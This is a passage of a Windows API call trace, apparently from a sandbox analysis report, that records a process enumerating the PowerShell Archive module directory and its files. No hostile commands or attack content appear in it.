lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0177.053] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.054] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.054] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.054] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0177.054] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0177.055] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0177.055] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.055] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0177.055] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0177.055] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0177.055] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.056] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.056] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0177.056] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0177.056] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.056] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0177.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0177.057] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0177.057] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0177.057] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.057] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.057] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0177.058] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0177.058] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0177.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0177.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0177.058] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0177.058] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0177.058] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0177.058] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.059] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0177.059] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.059] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0177.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2d0) returned 1 [0177.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de290) returned 1 [0177.059] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7ddf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0177.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3b0) returned 1 [0177.059] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b7de490 | out: lpFileInformation=0x1b7de490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de370) returned 1 [0177.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de3e0) returned 1 [0177.059] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7dded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0177.059] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0177.060] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7de080 | out: lpFindFileData=0x1b7de080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0177.060] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.060] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0177.061] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0177.061] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0177.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de330) returned 1 [0177.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2f0) returned 1 [0177.090] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psd1")) returned 0xffffffff [0177.090] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psm1")) returned 0xffffffff [0177.090] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.cdxml")) returned 0xffffffff [0177.091] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.xaml")) returned 0xffffffff [0177.091] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.dll")) returned 0xffffffff [0177.091] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0177.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.091] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.091] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0177.091] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0177.091] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.092] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.092] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.092] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0177.092] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0177.092] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0177.092] FindClose (in: hFindFile=0x1a592010 | out: 